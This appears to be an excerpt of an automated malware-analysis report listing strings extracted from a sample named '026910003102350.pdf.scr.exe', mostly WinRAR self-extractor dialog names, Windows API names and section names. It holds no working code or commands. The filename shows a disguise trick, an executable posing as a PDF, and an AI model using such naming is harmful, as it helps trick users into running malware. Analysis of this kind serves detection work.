      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $startdlg:size
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $startdlg:caption
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $startdlg:idc_destedittitle
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $startdlg:idc_changedir
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $startdlg:idc_progressbartitle
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $startdlg:idok
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $startdlg:idcancel
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $replacefiledlg:size
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $replacefiledlg:caption
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $replacefiledlg:idc_owrfileexists
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $replacefiledlg:idc_owraskreplace
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $replacefiledlg:idc_owrquestion
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $replacefiledlg:idc_owryes
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $replacefiledlg:idc_owrall
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $replacefiledlg:idc_owrrename
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $replacefiledlg:idc_owrno
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $replacefiledlg:idc_owrnoall
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $replacefiledlg:idc_owrcancel
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $renamedlg:size
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $renamedlg:caption
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $renamedlg:idok
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $renamedlg:idcancel
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $renamedlg:idc_renamefrom
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $renamedlg:idc_renameto
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $getpassword1:size
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $getpassword1:caption
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $getpassword1:idc_passwordenter
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $getpassword1:idok
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $getpassword1:idcancel
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $licensedlg:size
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $licensedlg:caption
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $licensedlg:idok
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $licensedlg:idcancel
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $asknextvol:size
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $asknextvol:caption
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $asknextvol:idc_nextvolinfo1
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $asknextvol:idc_nextvolfind
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $asknextvol:idc_nextvolinfo2
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $asknextvol:idok
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $asknextvol:idcancel
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: user32.dll
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: gdi32.dll
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: comdlg32.dll
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: advapi32.dll
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: shell32.dll
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: ppngriched20.dlls:ids_browsetitles:ids_cmdextractings:ids_skippings:ids_unexpeofs:ids_fileheaderbrokens:ids_headerbrokens:ids_mainheaderbrokens:ids_cmtheaderbrokens:ids_cmtbrokens:ids_outofmemoryerrors:ids_unknownmethods:ids_cannotopens:ids_cannotcreates:ids_cannotmkdirs:ids_encrcrcfaileds:ids_extrcrcfaileds:ids_packeddatacrcfaileds:ids_writeerrors:ids_readerrors:ids_closeerrors:ids_cannotfindvols:ids_badarchives:ids_extractings:ids_asknextvoltitles:ids_archeaderbrokens:ids_dones:ids_errors:ids_errorss:ids_bytess:ids_modifiedons:ids_badfolders:ids_createerrorss:ids_restarthints:ids_crcerrorss:ids_allfiless:ids_title1s:ids_title1as:ids_title2s:ids_title3s:ids_title4s:ids_title5s:ids_title6s:ids_arcbrokens:ids_extrfilestos:ids_extrfilestotemps:ids_extractbuttons:ids_extractprogresss:ids_maxpathlimits:ids_unkencmethods:ids_wrongpasswords:ids_wrongfilepasswords:ids_copyerrors:ids_cannotcreatelnkss:ids_cannotcreatelnkhs:ids_errlnktargets:ids_needadmins:ids_pauses:ids_continues:ids_secwarnings:ids_secdeldll$startdlg:size$startdlg:caption$startdlg:idc_destedittitle$startdlg:idc_changedir$startdlg:idc_progressbartitle$startdlg:idok$startdlg:idcancel$replacefiledlg:size$replacefiledlg:caption$replacefiledlg:idc_owrfileexists$replacefiledlg:idc_owraskreplace$replacefiledlg:idc_owrquestion$replacefiledlg:idc_owryes$replacefiledlg:idc_owrall$replacefiledlg:idc_owrrename$replacefiledlg:idc_owrno$replacefiledlg:idc_owrnoall$replacefiledlg:idc_owrcancel$renamedlg:size$renamedlg:caption$renamedlg:idok$renamedlg:idcancel$renamedlg:idc_renamefrom$renamedlg:idc_renameto$getpassword1:size$getpassword1:caption$getpassword1:idc_passwordenter$getpassword1:idok$getpassword1:idcancel$licensedlg:size$licensedlg:caption$licensedlg:idok$licensedlg:idcancel$asknextvol:size$asknextvol:caption$asknextvol:idc_nextvolinfo1$asknextvol:idc_nextvolfin
d$asknextvol:idc_nextvolinfo2$asknextvol:idok$asknextvol:idcancelrarsfxstaticreplacefiledlgrenamedlg%s %s %s%s %sgetpassword1%sxasknextvolwinrarsfxmappingfile.tmpsfxname%4d-%02d-%02d-%02d-%02d-%02d-%03dsfxstimestartdlgsfxcmdsfxparlicensedlg __tmp_rar_sfx_access_check_%u-el -s2 "-d%s" "-sp%s"runas"%s"
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: %sdeletetexttitlepathsilentoverwritesetuptempmodelicensepresetupshortcutsavepathupdatesetupcode%s.%d.tmpsoftware\microsoft\windows\currentversionprogramfilesdir\hidemaxmin%s%s%u.lnk.infinstallsoftware\winrar sfxuser32.dllgdi32.dllcomdlg32.dlladvapi32.dllshell32.dll
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: ole32.dll
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: fole32.dll
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: acquiresrwlockexclusive
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: releasesrwlockexclusive
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: shlwapi.dll
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: comctl32.dll
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: kernel32.dllacquiresrwlockexclusivereleasesrwlockexclusiveshlwapi.dllcomctl32.dll
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: bad array new length
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: bad array new length@
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: <5ikq
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: bad exception
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: __based(
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: __cdecl
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: __pascal
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: d:\projects\winrar\sfx\build\sfxrar32\release\sfxrar.pdb
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .rtc$taa
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .rtc$tzz
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .xdata$x
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .didat$2
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .didat$3
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .didat$3
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .didat$4
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .didat$6
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .didat$7
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .didat$7p
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .edata
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: 4.edata
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .idata$2
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: <.idata$2
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .idata$3
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .idata$4
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .idata$4l
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .idata$6
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .data
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .data
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .data$r
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .data$rs
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .bss0
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .didat$5
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .didat$5@
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .rsrc$01
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .rsrc$01pf
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .rsrc$02
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .rsrc$02"
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: showwindow
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: showwindow'
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getdlgitem
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: enablewindow
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: setwindowtextw
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: setwindowtextwd
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getparent
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: setwindowpos
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: setdlgitemtextw
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: setdlgitemtextw~
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getsystemmetrics
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getclientrect
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getwindowrect
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getwindowlongw
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: setwindowlongw
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: setprocessdefaultlayout
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getwindow
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: loadstringw
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: loadstringw"
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: oemtocharbuffa
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: charupperw
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: oemtocharbuffa<charupperw
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: defwindowprocw
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: defwindowprocwm
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: registerclassexw
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: createwindowexw
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: registerclassexwncreatewindowexw
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: iswindow
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: destroywindow
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: updatewindow
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: updatewindow
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: mapwindowpoints
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: copyrect
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: mapwindowpointsucopyrect
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: loadcursorw
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: loadcursorw|
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: sendmessagew
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: sendmessagew!
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getdc
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getdce
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: releasedc
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: messageboxw
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: findwindowexw
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getclassnamew
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: copyimage
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getclassnamewtcopyimage5
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: wvsprintfw
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: wvsprintfw]
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getmessagew
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: translatemessage
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: dispatchmessagew
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: dispatchmessagew3
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: peekmessagew
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: peekmessagew6
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: postmessagew
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: postmessagew&
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: waitforinputidle
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: iswindowvisible
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: dialogboxparamw
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: enddialog
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: enddialog*
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getdlgitemtextw
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getdlgitemtextws
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: senddlgitemmessagew
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: setfocus
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: setforegroundwindow
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: setforegroundwindow{
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getsyscolor
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: loadbitmapw
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: loadiconw
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: destroyicon
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: isdialogmessagew
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: createcompatiblebitmap
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: createcompatibledc
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: isdialogmessagew/createcompatiblebitmap0createcompatibledc
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: deletedc
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: deleteobject
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getdevicecaps
